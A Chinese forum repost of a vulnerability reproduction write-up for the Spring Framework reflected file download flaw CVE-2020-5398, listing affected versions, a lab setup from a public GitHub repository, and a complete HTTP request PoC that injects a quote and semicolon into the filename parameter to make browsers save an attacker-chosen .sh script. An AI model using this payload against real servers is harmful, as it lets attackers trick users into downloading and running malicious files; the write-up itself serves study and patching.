请选择 进入手机版 | 继续访问电脑版

Spring Framework 反射型文件下载漏洞(CVE-2020-5398)复现

[复制链接]
尊悦模具刘沛昌 发表于 2020-12-31 19:23:44 | 显示全部楼层 |阅读模式 打印 上一主题 下一主题
漏洞概述

Spring是一个Java/Java EE/.NET的分层应用步调框架。 Spring Framework 存在反射型文件下载漏洞 。 此漏洞由于Spring Framework并没有对filename传入的文件名进行严格的安全检测,攻击者可以通过截断的方式控制filename变量值,下载任意格式的文件。
 
 
影响版本

  1. Spring Framework 5.2.0 – 5.2.2Spring Framework 5.1.0 – 5.1.12Spring Framework 5.0.0 – 5.0.15
复制代码
 
 
情况搭建

 
下载地点
  1. https://github.com/motikan2010/CVE-2020-5398.git
复制代码
  1. 首先先下载git clone https://github.com/motikan2010/CVE-2020-5398.git接着运行./gradlew bootrun
复制代码

访问your-ip:8080即可看到页面

漏洞复现

 
Poc
  1. GET /?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Awhoami HTTP/1.1Host: 192.168.204.131:8080User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1
复制代码
 
构建数据包发送

使用";闭合响应中Content-Disposition头的filename字段,使得在欣赏器中下载的时候生存为任意文件名,而且可控制后缀
 
修复发起

 
官方修复补丁下载地点:
  1. https://github.com/spring-projects/spring-framework
复制代码
 

来源:https://blog.csdn.net/xuandao_ahfengren/article/details/111999006
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

发布主题

专注素材教程免费分享
全国免费热线电话

18768367769

周一至周日9:00-23:00

反馈建议

27428564@qq.com 在线QQ咨询

扫描二维码关注我们

Powered by Discuz! X3.4© 2001-2013 Comsenz Inc.( 蜀ICP备2021001884号-1 )